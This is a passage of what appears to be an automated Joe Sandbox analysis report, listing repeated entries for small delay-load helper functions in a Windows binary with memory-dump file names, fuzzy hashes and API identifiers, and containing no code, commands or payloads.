                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID: s
                                                                                    • API String ID: 1269201914-1424750476
                                                                                    • Opcode ID: c30dd849b9e4733be27c2ef68580431f5660ed35e0dd91de09fc1b88241d81aa
                                                                                    • Instruction ID: b566639204146a77b82584c7962a855c726fed6de3e7987366f1ff7bd788865d
                                                                                    • Opcode Fuzzy Hash: c30dd849b9e4733be27c2ef68580431f5660ed35e0dd91de09fc1b88241d81aa
                                                                                    • Instruction Fuzzy Hash: B0B012D669C208EC3104618D1C0AD77010CC0C0F11730403EFC05C00C2F88C6C040631
                                                                                    Function 0073E1D1 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0073E1E3
                                                                                      • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                      • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID: s
                                                                                    • API String ID: 1269201914-1424750476
                                                                                    • Opcode ID: 0e362b4ab50ad646d9bcc9e24b78a98c51f85def237ab55f16092dbea094ec32
                                                                                    • Instruction ID: cff15c2ba6a6bc965a8b33e3ba546e0daf4e2c93847c88e67098ee6824808acf
                                                                                    • Opcode Fuzzy Hash: 0e362b4ab50ad646d9bcc9e24b78a98c51f85def237ab55f16092dbea094ec32
                                                                                    • Instruction Fuzzy Hash: 83B012D6698204FC310421891C0AC77010CC0C1F11730843EFC01C04C2F88CAC040431
                                                                                    Function 0073E264 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0073E1E3
                                                                                      • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                      • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID: s
                                                                                    • API String ID: 1269201914-1424750476
                                                                                    • Opcode ID: 7487020f1e36f48d9fec119daa61bfe49dc24f174e5b62f485fcc0ffadf2a909
                                                                                    • Instruction ID: 4115b9989d44e8f265b8b502e64be86146fbbf08ac8b0cc7365d9df35b8db461
                                                                                    • Opcode Fuzzy Hash: 7487020f1e36f48d9fec119daa61bfe49dc24f174e5b62f485fcc0ffadf2a909
                                                                                    • Instruction Fuzzy Hash: 13B012D26A9144EC310461891C0AD77014DC4C0F11B30403EFC06C00C2E88C6C040531
                                                                                    Function 0073E26E Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0073E1E3
                                                                                      • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                      • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID: s
                                                                                    • API String ID: 1269201914-1424750476
                                                                                    • Opcode ID: aa0459f5ddb45448e2c818f609fbdec6c734b1ccbaa53b84fb8b65f20dead06d
                                                                                    • Instruction ID: 09d99f4ca92617fe5929ef9a833a62be0849bfd39806d0bf1ed7a8472bdb5b5f
                                                                                    • Opcode Fuzzy Hash: aa0459f5ddb45448e2c818f609fbdec6c734b1ccbaa53b84fb8b65f20dead06d
                                                                                    • Instruction Fuzzy Hash: 9BB012D2698104EC3104A1591C0AD77014CC0C1F11730803EFC05C00C2E88CAC040531
                                                                                    Function 0073E250 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0073E1E3
                                                                                      • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                      • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID: s
                                                                                    • API String ID: 1269201914-1424750476
                                                                                    • Opcode ID: e01fbb334ef384be0e4690081ad33b477440f1e6fcd2ca777e65de8094249edd
                                                                                    • Instruction ID: c9213658e33f9002d51c033306f88e752b8172ee876208255bfe73b3639bb808
                                                                                    • Opcode Fuzzy Hash: e01fbb334ef384be0e4690081ad33b477440f1e6fcd2ca777e65de8094249edd
                                                                                    • Instruction Fuzzy Hash: 06B012E2699244FC314462495C0AD77010DC0C0F11B30413EFC05C00C2E88C6C480631
                                                                                    Function 0073E246 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0073E1E3
                                                                                      • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                      • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID: s
                                                                                    • API String ID: 1269201914-1424750476
                                                                                    • Opcode ID: f609ad6877b97d73e797af73b5ca776b6aabc6b485b1a8c1e7cc277194a59de0
                                                                                    • Instruction ID: 35eb192b1463267c653cb59e0ef77aa6c55252ff5ae61395d762545ba9ad6ff4
                                                                                    • Opcode Fuzzy Hash: f609ad6877b97d73e797af73b5ca776b6aabc6b485b1a8c1e7cc277194a59de0
                                                                                    • Instruction Fuzzy Hash: 64B012D2699144EC310461491C0AD77010DC0C1F11B30803EFC05C00C2E88CAC040531
                                                                                    Function 0073E232 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0073E1E3
                                                                                      • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                      • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID: s
                                                                                    • API String ID: 1269201914-1424750476
                                                                                    • Opcode ID: fadb19a0798e1a2a1d0c866265711b12a727efa1c01f45be8b29f11ceaf9092b
                                                                                    • Instruction ID: 7ec039377315a6bff887bd89e0eee51f34c720f76648cc5b860bde21cd1b7a3e
                                                                                    • Opcode Fuzzy Hash: fadb19a0798e1a2a1d0c866265711b12a727efa1c01f45be8b29f11ceaf9092b
                                                                                    • Instruction Fuzzy Hash: DBB012E2698104EC310461491D0AD77010DC0C0F11730403EFC05C00C2FC8C6E050531
                                                                                    Function 0073E23C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0073E1E3
                                                                                      • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                      • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID: s
                                                                                    • API String ID: 1269201914-1424750476
                                                                                    • Opcode ID: 691d6bde7fff1ab09308fd7e7b0099e193ff286cf371a6fdffd8586e757bcfa3
                                                                                    • Instruction ID: cd3a4aad8cfb1b1bde0813227e2940570cd3f0418b8e2f59414c1cef7fdc113a
                                                                                    • Opcode Fuzzy Hash: 691d6bde7fff1ab09308fd7e7b0099e193ff286cf371a6fdffd8586e757bcfa3
                                                                                    • Instruction Fuzzy Hash: 6FB012E2698104EC3104614A1C0AD77010DC0C0F11730403EFC05C00C2F88C6D040531
                                                                                    Function 0073E228 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0073E1E3
                                                                                      • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                      • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID: s
                                                                                    • API String ID: 1269201914-1424750476
                                                                                    • Opcode ID: ccd5af15ae2f0f37eefbd8ef25444280ebac705cbdfba16c113343609017020f
                                                                                    • Instruction ID: 2ab8a50767dd8a0023e469e4a0ce641d66d9d6d4107e04cb057f720eca059030
                                                                                    • Opcode Fuzzy Hash: ccd5af15ae2f0f37eefbd8ef25444280ebac705cbdfba16c113343609017020f
                                                                                    • Instruction Fuzzy Hash: 28B012E2698204FC314461495C0AD77010DC0C0F11B30413EFC05C00C2F88C6D440631
                                                                                    Function 0073E21E Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0073E1E3
                                                                                      • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                      • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID: s
                                                                                    • API String ID: 1269201914-1424750476
                                                                                    • Opcode ID: 6099160d36f117dc998f50eee27b37e23b3c3802737712501e5fd0574e8ffe14
                                                                                    • Instruction ID: a8aac6331a2ceea49d4ba6c71a653f235781360813f7013d39d18684b3eab226
                                                                                    • Opcode Fuzzy Hash: 6099160d36f117dc998f50eee27b37e23b3c3802737712501e5fd0574e8ffe14
                                                                                    • Instruction Fuzzy Hash: 9CB012E2698104FC310461491C0AD77010DC0C1F11730803EFC05C00C2F88CAD040531
                                                                                    Function 0073E200 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0073E1E3
                                                                                      • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                      • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID: s
                                                                                    • API String ID: 1269201914-1424750476
                                                                                    • Opcode ID: 5bf6338444eb64f95c44e5140538734aa0d36ecfe9b0250dfbd2ba4716ec0e00
                                                                                    • Instruction ID: f102da5f107f2beb95c370f48942cf69abdc45853bd70827b87138b72a88a176
                                                                                    • Opcode Fuzzy Hash: 5bf6338444eb64f95c44e5140538734aa0d36ecfe9b0250dfbd2ba4716ec0e00
                                                                                    • Instruction Fuzzy Hash: F7B012D2798244FC3144624D5C0AD77010CC0C0F11730813FFC15C01C2E88C6C480631
                                                                                    Function 0073E20A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0073E1E3
                                                                                      • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                      • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID: s
                                                                                    • API String ID: 1269201914-1424750476
                                                                                    • Opcode ID: 4d72e5dce5d629abc78cd4ec43d4bb5331eae5fb30fce5c888dc4ecb86db554b
                                                                                    • Instruction ID: e448adc2be7529ae8117fd4f26b18f8cc9155cd5f968c8b4505dc4c06c456418
                                                                                    • Opcode Fuzzy Hash: 4d72e5dce5d629abc78cd4ec43d4bb5331eae5fb30fce5c888dc4ecb86db554b
                                                                                    • Instruction Fuzzy Hash: 38B012D2698104EC3104624D1D0AD77010CC0C0F11730803FFC05C01C2EC9C6D0D0531
                                                                                    Function 0073EAE7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0073EAF9
                                                                                      • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                      • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID: 3Ro
                                                                                    • API String ID: 1269201914-1492261280
                                                                                    • Opcode ID: f36fce7c504868c251e386eda2104691bfc52d4cba62cb94fe3e5de55ea26f91
                                                                                    • Instruction ID: 56574086855cc050ac47dd8b611d7e8605b59798077466543eace658c0bfd77c
                                                                                    • Opcode Fuzzy Hash: f36fce7c504868c251e386eda2104691bfc52d4cba62cb94fe3e5de55ea26f91
                                                                                    • Instruction Fuzzy Hash: E1B092C629A142BC310462041E06C760109C080B91720902AB800880C2988C09060431
                                                                                    Function 0073E282 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
